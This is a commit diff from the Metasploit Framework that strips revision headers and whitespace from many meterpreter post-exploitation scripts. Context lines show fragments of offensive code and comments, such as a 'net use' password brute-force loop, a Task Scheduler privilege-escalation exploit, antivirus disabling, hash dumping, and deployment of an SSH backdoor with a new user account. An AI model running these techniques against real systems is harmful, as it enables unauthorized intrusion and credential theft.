 		range = val
300
-		
298
+
301 299
 	when "-h"
302 300
 		print(
303 301
 			"Network Enumerator Meterpreter Script\n" +

+ 0
- 2
scripts/meterpreter/packetrecorder.rb View File

@@ -1,5 +1,3 @@
1
-# $Id$
2
-# $Revision$
3 1
 # Author: Carlos Perez at carlos_perez[at]darkoperator.com
4 2
 #-------------------------------------------------------------------------------
5 3
 ################## Variable Declarations ##################

+ 0
- 2
scripts/meterpreter/panda_2007_pavsrv51.rb View File

@@ -1,5 +1,3 @@
1
-# $Id: panda_2007_pavsrv51.rb 8734 2010-03-07 22:49:08Z mc $
2
-# $Revision: $
3 1
 ##
4 2
 # This file is part of the Metasploit Framework and may be subject to
5 3
 # redistribution and commercial restrictions. Please see the Metasploit

+ 0
- 2
scripts/meterpreter/persistence.rb View File

@@ -1,5 +1,3 @@
1
-# $Id$
2
-# $Revision$
3 1
 # Author: Carlos Perez at carlos_perez[at]darkoperator.com
4 2
 #-------------------------------------------------------------------------------
5 3
 ################## Variable Declarations ##################

+ 0
- 2
scripts/meterpreter/pml_driver_config.rb View File

@@ -1,5 +1,3 @@
1
-# $Id$
2
-# $Revision$
3 1
 ##
4 2
 # This file is part of the Metasploit Framework and may be subject to
5 3
 # redistribution and commercial restrictions. Please see the Metasploit

+ 0
- 2
scripts/meterpreter/powerdump.rb View File

@@ -1,5 +1,3 @@
1
-# $Id$
2
-# $Revision$
3 1
 #
4 2
 # Meterpreter script for utilizing purely PowerShell to extract username and password hashes through registry
5 3
 # keys. This script requires you to be running as system in order to work properly. This has currently been

+ 0
- 2
scripts/meterpreter/prefetchtool.rb View File

@@ -1,5 +1,3 @@
1
-# $Id$
2
-# $Revision$
3 1
 #Meterpreter script for extracting information from windows prefetch folder
4 2
 #Provided by Milo at keith.lee2012[at]gmail.com
5 3
 #Verion: 0.1.0

+ 0
- 2
scripts/meterpreter/process_memdump.rb View File

@@ -1,5 +1,3 @@
1
-# $Id$
2
-# $Revision$
3 1
 # Author: Carlos Perez at carlos_perez[at]darkoperator.com
4 2
 # Note: Script is based on the paper Neurosurgery With Meterpreter by
5 3
 #	Colin Ames (amesc[at]attackresearch.com) David Kerb (dkerb[at]attackresearch.com)

+ 1
- 3
scripts/meterpreter/remotewinenum.rb View File

@@ -1,5 +1,3 @@
1
-# $Id$
2
-# $Revision$
3 1
 # Author: Carlos Perez at carlos_perez[at]darkoperator.com
4 2
 #-------------------------------------------------------------------------------
5 3
 ################## Variable Declarations ##################
@@ -62,7 +60,7 @@ def wmicexec(session,wmic,user,pass,trgt)
62 60
 		tmp = session.fs.file.expand_path("%TEMP%")
63 61
 		# Temporary file on windows host to store results
64 62
 		wmicfl = tmp + "\\wmictmp#{rand(100000)}.txt"
65
-		
63
+
66 64
 		wmic.each do |wmi|
67 65
 			if user == nil
68 66
 				print_status("The commands will be ran under the credentials of #{runningas}")

+ 0
- 2
scripts/meterpreter/scheduleme.rb View File

@@ -1,5 +1,3 @@
1
-# $Id$
2
-# $Revision$
3 1
 
4 2
 #Meterpreter script for automating the most common scheduling tasks
5 3
 #during a pentest. This script will use the schtasks command so as

+ 1
- 6
scripts/meterpreter/schelevator.rb View File

@@ -1,8 +1,3 @@
1
-##
2
-# $Id$
3
-# $Revision$
4
-##
5
-
6 1
 ##
7 2
 #
8 3
 # This script exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet
@@ -255,7 +250,7 @@ def fix_crc32(data, old_crc)
255 250
 
256 251
 	crc = crc32(data[0, data.length - 12])
257 252
 	data[-12, 4] = [crc].pack('V')
258
-	
253
+
259 254
 	data[-12, 12].unpack('C*').reverse.each { |b|
260 255
 		old_crc = ((old_crc << 8) ^ bwd_table[old_crc >> 24] ^ b) & 0xffffffff
261 256
 	}

+ 0
- 2
scripts/meterpreter/schtasksabuse.rb View File

@@ -1,5 +1,3 @@
1
-# $Id$
2
-# $Revision$
3 1
 
4 2
 #Meterpreter script for abusing the scheduler service in windows
5 3
 #by scheduling and running a list of command against one or more targets

+ 0
- 2
scripts/meterpreter/scraper.rb View File

@@ -1,5 +1,3 @@
1
-# $Id$
2
-# $Revision$
3 1
 # This is a Meterpreter script designed to be used by the Metasploit Framework
4 2
 #
5 3
 # The goal of this script is to obtain system information from a victim through

+ 0
- 2
scripts/meterpreter/screen_unlock.rb View File

@@ -1,6 +1,4 @@
1 1
 #
2
-# $Id$
3
-#
4 2
 # Script to unlock a windows screen by L4teral <l4teral [4t] gmail com>
5 3
 # Needs system prvileges to run and known signatures for the target system.
6 4
 # This script patches msv1_0.dll loaded by lsass.exe

+ 0
- 2
scripts/meterpreter/screenspy.rb View File

@@ -1,5 +1,3 @@
1
-# $Id$
2
-# $Revision$
3 1
 # Author:Roni Bachar (@roni_bachar) roni.bachar.blog@gmail.com
4 2
 #
5 3
 # Thie script will open an interactive view of remote hosts

+ 0
- 2
scripts/meterpreter/search_dwld.rb View File

@@ -1,5 +1,3 @@
1
-# $Id$
2
-# $Revision$
3 1
 
4 2
 ## Meterpreter script that recursively search and download
5 3
 ## files matching a given pattern

+ 3
- 5
scripts/meterpreter/service_manager.rb View File

@@ -1,5 +1,3 @@
1
-# $Id$
2
-# $Revision$
3 1
 # Author: Carlos Perez <carlos_perez [at] darkoperator.com and Shai rod (@NightRang3r)
4 2
 #-------------------------------------------------------------------------------
5 3
 ################## Variable Declarations ##################
@@ -115,7 +113,7 @@ elsif srv_start
115 113
 			elsif returned_value == 2
116 114
 				print_error("Service #{srv_name} is Disabled could not be started.")
117 115
 			end
118
-			
116
+
119 117
 		rescue
120 118
 			print_error("A Service Name must be provided, service names are case sensitive.")
121 119
 		end
@@ -137,7 +135,7 @@ elsif srv_stop
137 135
 			elsif returned_value == 2
138 136
 				print_error("Service #{srv_name} can not be stopped.")
139 137
 			end
140
-			
138
+
141 139
 		rescue
142 140
 			print_error("A Service Name must be provided, service names are case sensitive.")
143 141
 		end
@@ -181,7 +179,7 @@ elsif srv_change_startup
181 179
 		print_error("No Service Name was provided!")
182 180
 	end
183 181
 	raise Rex::Script::Completed
184
-	
182
+
185 183
 # Create a service
186 184
 elsif srv_create
187 185
 	priv_check

+ 0
- 2
scripts/meterpreter/service_permissions_escalate.rb View File

@@ -1,6 +1,4 @@
1 1
 ##
2
-# $Id$
3
-#
4 2
 # Many services are configured with insecure permissions. This
5 3
 # script attempts to create a service, then searches through a list of
6 4
 # existing services to look for insecure file or configuration

+ 0
- 2
scripts/meterpreter/sound_recorder.rb View File

@@ -1,5 +1,3 @@
1
-# $Id$
2
-# $Revision$
3 1
 # Author: Carlos Perez at carlos_perez[at]darkoperator.com
4 2
 #-------------------------------------------------------------------------------
5 3
 ################## Variable Declarations ##################

+ 0
- 3
scripts/meterpreter/srt_webdrive_priv.rb View File

@@ -1,6 +1,3 @@
1
-# $Id$
2
-# $Revision$
3
-
4 1
 ##
5 2
 # South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation.
6 3
 #

+ 0
- 2
scripts/meterpreter/uploadexec.rb View File

@@ -1,5 +1,3 @@
1
-# $Id$
2
-# $Revision$
3 1
 
4 2
 session = client
5 3
 @@exec_opts = Rex::Parser::Arguments.new(

+ 0
- 4
scripts/meterpreter/virtualbox_sysenter_dos.rb View File

@@ -1,10 +1,6 @@
1
-# $Id$
2
-
3 1
 # Meterpreter script for triggering the VirtualBox DoS published at:
4 2
 # http://milw0rm.com/exploits/9323
5 3
 
6
-# $Revision$
7
-
8 4
 opts = Rex::Parser::Arguments.new(
9 5
 	"-h" => [ false,"Help menu." ]
10 6
 )

+ 0
- 3
scripts/meterpreter/virusscan_bypass.rb View File

@@ -1,6 +1,3 @@
1
-# $Id$
2
-# $Revision$
3
-
4 1
 # Meterpreter script that kills Mcafee VirusScan Enterprise v8.7.0i+ processes in magic
5 2
 # order which keeps VirusScan icon visible at system tray without disabled sign on it.
6 3
 # Additionally it lets you disable On Access Scanner from registry, upload your detectable

+ 0
- 3
scripts/meterpreter/vnc.rb View File

@@ -1,6 +1,3 @@
1
-# $Id$
2
-# $Revision$
3
-
4 1
 #
5 2
 # Meterpreter script for obtaining a quick VNC session
6 3
 #

+ 0
- 2
scripts/meterpreter/webcam.rb View File

@@ -1,5 +1,3 @@
1
-#  $Id$
2
-#  $Revision$
3 1
 #  Author: scriptjunkie
4 2
 #
5 3
 # Simplify running webcam, whether grabbing a single frame or running

+ 4
- 8
scripts/meterpreter/win32-sshclient.rb View File

@@ -1,7 +1,3 @@
1
-# win32-sshclient.rb
2
-#
3
-# $Id$
4
-# $Revision$
5 1
 #
6 2
 # Meterpreter script to deploy & run the "plink" commandline ssh-client
7 3
 # supports only MS-Windows-2k/XP/Vista Hosts
@@ -154,7 +150,7 @@ downloaded = nil
154 150
 			usage
155 151
 		end
156 152
 		rhost = val
157
-		
153
+
158 154
 	when "-f"
159 155
 		if !val
160 156
 			print_error("-f requires an argument !")
@@ -166,14 +162,14 @@ downloaded = nil
166 162
 			usage
167 163
 		end
168 164
 		manual = true
169
-		
165
+
170 166
 	when "-r"
171 167
 		if !val
172 168
 			print_error("-r requires an argument !")
173 169
 			usage
174 170
 		end
175 171
 		hostkey = val
176
-	
172
+
177 173
 	when "-p"
178 174
 		rport = val.to_i
179 175
 
@@ -323,7 +319,7 @@ if not manual
323 319
 		plinkexe = Net::HTTP.get URI.parse(plinkurl)
324 320
 		File.open(plink, "wb") { |fd| fd.write(plinkexe) }
325 321
 		print_status("plink.exe has been downloaded to #{plink} (local machine). Please remove manually after use or keep for reuse.")
326
-		downloaded = true	
322
+		downloaded = true
327 323
 	end
328 324
 end
329 325
 

+ 14
- 18
scripts/meterpreter/win32-sshserver.rb View File

@@ -1,7 +1,3 @@
1
-# win32-sshserver.rb
2
-#
3
-# $Id$
4
-# $Revision$
5 1
 #
6 2
 # meterpreter-script to deploy + run OpenSSH
7 3
 # on the target machine
@@ -95,10 +91,10 @@ type = "auto"
95 91
 #
96 92
 @@exec_opts.parse(args) { |opt, idx, val|
97 93
 	case opt
98
-		
94
+
99 95
 	when "-h"
100 96
 		usage
101
-		
97
+
102 98
 	when "-f"
103 99
 		if !val
104 100
 			print_error("-f requires the SFX-filename as argument !")
@@ -110,14 +106,14 @@ type = "auto"
110 106
 			usage
111 107
 		end
112 108
 		manual = true
113
-		
109
+
114 110
 	when "-U"
115 111
 		if !val
116 112
 			print_error("-U requires the download-URL for the OpenSSH-SFX as argument !")
117 113
 			usage
118 114
 		end
119 115
 		downloadurl = val
120
-		
116
+
121 117
 	when "-p"
122 118
 		if !val
123 119
 			print_error("-p requires the password (for the windows-user to add) as argument !")
@@ -128,47 +124,47 @@ type = "auto"
128 124
 			usage
129 125
 		end
130 126
 		password = val
131
-		
127
+
132 128
 	when "-u"
133 129
 		if !val
134 130
 			print_error("-u requires the username (for the windows-user to add) as argument!")
135 131
 			usage
136 132
 		end
137 133
 		username = val
138
-		
134
+
139 135
 	when "-r"
140 136
 		uninstall = true
141
-		
137
+
142 138
 	when "-I"
143 139
 		if !val
144 140
 			print_error("-I requires a directory-name to use as installpath")
145 141
 			usage
146 142
 		end
147 143
 		dirname = val
148
-		
144
+
149 145
 	when "-F"
150 146
 		forced = true
151
-		
147
+
152 148
 	when "-S"
153 149
 		if !val
154 150
 			print_error("-S requires s custom string to use as the service-description")
155 151
 			usage
156 152
 		end
157 153
 		servicedesc = val
158
-		
154
+
159 155
 	when "-N"
160 156
 		if !val
161 157
 			print_error("-N requires a custom string to use as service-name")
162 158
 			usage
163 159
 		end
164 160
 		servicename = val
165
-		
161
+
166 162
 	when "-m"
167 163
 		noauto = true
168
-		
164
+
169 165
 	when "-t"
170 166
 		type = manual
171
-		
167
+
172 168
 	else
173 169
 		print_error("Unknown option: #{opt}")
174 170
 		usage
@@ -332,7 +328,7 @@ unless username == "none"
332 328
 		print_error("You need to provide a nonempty password for the user with the \"-p\"-parameter!")
333 329
 		usage
334 330
 	end
335
-	
331
+
336 332
 	#Get localized name for windows-admin-grp
337 333
 	admingrpname = nil
338 334
 	client.sys.process.execute("cmd.exe", "/c #{dirname}\\bin\\mkgroup.exe -l > #{dirname}\\groupnames.txt")

+ 5
- 7
scripts/meterpreter/winbf.rb View File

@@ -1,5 +1,3 @@
1
-# $Id$
2
-# $Revision$
3 1
 # Author: Carlos Perez at carlos_perez[at]darkoperator.com
4 2
 #-------------------------------------------------------------------------------
5 3
 ################## Variable Declarations ##################
@@ -85,7 +83,7 @@ def passbf(session,passlist,target,user,opt,logfile)
85 83
 			::File.open(passlist, "r").each_line do |line|
86 84
 				begin
87 85
 					print_status("Trying #{u.chomp} #{line.chomp}")
88
-					
86
+
89 87
 					# Command for testing local login credentials
90 88
 					r = session.sys.process.execute("cmd /c net use \\\\#{target} #{line.chomp} /u:#{u.chomp}", nil, {'Hidden' => true, 'Channelized' => true})
91 89
 					while(d = r.channel.read)
@@ -93,7 +91,7 @@ def passbf(session,passlist,target,user,opt,logfile)
93 91
 					end
94 92
 					r.channel.close
95 93
 					r.close
96
-					
94
+
97 95
 					# Checks if password is found
98 96
 					result = output.to_s.scan(/The\scommand\scompleted\ssuccessfully/)
99 97
 					if result.length == 1
@@ -158,12 +156,12 @@ unsupported if client.platform !~ /win32|win64/i
158 156
 	when "-L"
159 157
 		userlist = val
160 158
 		ulopt = 1
161
-		
159
+
162 160
 	when "-cp"
163 161
 		chkpolicy(session)
164 162
 		exit
165 163
 	when "-p"
166
-		
164
+
167 165
 		passlist = val
168 166
 		if not ::File.exists?(passlist)
169 167
 			raise "Password File does not exists!"
@@ -176,7 +174,7 @@ unsupported if client.platform !~ /win32|win64/i
176 174
 			@@exec_opts.usage)
177 175
 		helpcall = 1
178 176
 	end
179
-	
177
+
180 178
 }
181 179
 
182 180
 # Execution of options selected

+ 2
- 4
scripts/meterpreter/winenum.rb View File

@@ -1,5 +1,3 @@
1
-# $Id$
2
-# $Revision$
3 1
 # Author: Carlos Perez at carlos_perez[at]darkoperator.com
4 2
 #-------------------------------------------------------------------------------
5 3
 ################## Variable Declarations ##################
@@ -170,7 +168,7 @@ def findprogs()
170 168
 			end
171 169
 		end
172 170
 	end
173
-	
171
+
174 172
 	file_local_write("#{@logfol}/programs_list.csv",proglist)
175 173
 end
176 174
 # Function to check if Target Machine a VM
@@ -555,7 +553,7 @@ def uaccheck()
555 553
 	else
556 554
 		print_status("\tUAC is Disabled")
557 555
 	end
558
-	
556
+
559 557
 	return uac
560 558
 end
561 559
 

+ 0
- 2
scripts/meterpreter/wmic.rb View File

@@ -1,5 +1,3 @@
1
-# $Id$
2
-# $Revision$
3 1
 #Meterpreter script for running WMIC commands on Windows 2003, Windows Vista
4 2
 # and Windows XP and Windows 2008 targets.
5 3
 #Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com

+ 0
- 2
scripts/shell/migrate.rb View File

@@ -1,5 +1,3 @@
1
-# $Id$
2
-# $Revision$
3 1
 #
4 2
 # Simply print a message that migrating is not supported on CommandShell sessions...
5 3
 #

+ 0
- 2
scripts/shell/spawn_meterpreter.rb View File

@@ -1,5 +1,3 @@
1
-# $Id$
2
-# $Revision$
3 1
 #
4 2
 # Spawn a meterpreter session using an existing command shell session
5 3
 #

Loading…
Cancel
Save